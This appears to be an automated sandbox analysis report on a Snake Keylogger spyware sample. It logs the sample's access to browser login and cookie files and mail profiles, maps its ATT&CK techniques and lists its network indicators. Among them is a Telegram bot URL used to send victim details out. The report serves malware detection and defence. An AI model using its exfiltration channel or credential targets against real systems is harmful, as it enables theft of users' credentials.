        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Bivejens.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: Bivejens.exe PID: 8056, type: MEMORYSTR
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: Yara matchFile source: Process Memory Space: Bivejens.exe PID: 8056, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: Bivejens.exe PID: 8056, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Disable or Modify Tools
        1
        OS Credential Dumping
        2
        File and Directory Discovery
        Remote Services1
        Archive Collected Data
        1
        Web Service
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        PowerShell
        Boot or Logon Initialization Scripts1
        Access Token Manipulation
        2
        Obfuscated Files or Information
        LSASS Memory116
        System Information Discovery
        Remote Desktop Protocol1
        Data from Local System
        3
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
        Process Injection
        1
        Software Packing
        Security Account Manager311
        Security Software Discovery
        SMB/Windows Admin Shares1
        Email Collection
        21
        Encrypted Channel
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        DLL Side-Loading
        NTDS1
        Process Discovery
        Distributed Component Object Model1
        Clipboard Data
        3
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Masquerading
        LSA Secrets141
        Virtualization/Sandbox Evasion
        SSHKeylogging14
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
        Virtualization/Sandbox Evasion
        Cached Domain Credentials1
        Application Window Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Access Token Manipulation
        DCSync1
        System Network Configuration Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
        Process Injection
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588340 Sample: TjoY7n65om.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 27 reallyfreegeoip.org 2->27 29 api.telegram.org 2->29 31 4 other IPs or domains 2->31 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Multi AV Scanner detection for submitted file 2->51 57 4 other signatures 2->57 8 TjoY7n65om.exe 1 23 2->8         started        signatures3 53 Tries to detect the country of the analysis system (by using the IP) 27->53 55 Uses the Telegram API (likely for C&C communication) 29->55 process4 file5 21 C:\Users\user\...\Thalamiflorous.Tus209, Unicode 8->21 dropped 11 powershell.exe 30 8->11         started        process6 file7 23 C:\Users\user\AppData\Local\...\Bivejens.exe, PE32 11->23 dropped 25 C:\Users\...\Bivejens.exe:Zone.Identifier, ASCII 11->25 dropped 59 Early bird code injection technique detected 11->59 61 Writes to foreign memory regions 11->61 63 Found suspicious powershell code related to unpacking or dynamic code loading 11->63 65 3 other signatures 11->65 15 Bivejens.exe 15 8 11->15         started        19 conhost.exe 11->19         started        signatures8 process9 dnsIp10 33 checkip.dyndns.com 132.226.247.73, 49918, 49937, 49948 UTMEMUS United States 15->33 35 api.telegram.org 149.154.167.220, 443, 49987 TELEGRAMRU United Kingdom 15->35 37 3 other IPs or domains 15->37 39 Multi AV Scanner detection for dropped file 15->39 41 Tries to steal Mail credentials (via file / registry access) 15->41 43 Tries to harvest and steal browser information (history, passwords, etc) 15->43 45 2 other signatures 15->45 signatures11

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        TjoY7n65om.exe50%ReversingLabsWin32.Spyware.Snakekeylogger
        TjoY7n65om.exe65%VirustotalBrowse
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\Bivejens.exe50%ReversingLabsWin32.Spyware.Snakekeylogger
        C:\Users\user\AppData\Local\Temp\Bivejens.exe65%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        s-part-0017.t-0009.t-msedge.net
        13.107.246.45
        truefalse
          high
          drive.google.com
          142.250.181.238
          truefalse
            high
            drive.usercontent.google.com
            142.250.185.65
            truefalse
              high
              reallyfreegeoip.org
              104.21.80.1
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  checkip.dyndns.com
                  132.226.247.73
                  truefalse
                    high
                    checkip.dyndns.org
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://reallyfreegeoip.org/xml/8.46.123.189false
                        high
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2011/01/2025%20/%2006:06:33%0D%0ACountry%20Name:%20United%20States%0D%0A[%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20]false
                          high
                          http://checkip.dyndns.org/false
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.office.com/Bivejens.exe, 00000005.00000002.2610716890.000000001E8B0000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E8A1000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://drive.usercontent.google.com/downloaBivejens.exe, 00000005.00000003.1695795682.00000000026A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/chrome_newtabBivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.orgBivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoBivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.org/botBivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://translate.google.com/translate_a/element.jsBivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.office.com/(lmBivejens.exe, 00000005.00000002.2610716890.000000001E8A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://www.office.com/lBBivejens.exe, 00000005.00000002.2610716890.000000001E8AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://drive.usercontent.google.com/Bivejens.exe, 00000005.00000002.2597746067.000000000268E000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1695795682.00000000026A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.orgBivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://nsis.sf.net/NSIS_ErrorErrorTjoY7n65om.exe, Bivejens.exe.2.drfalse
                                                          high
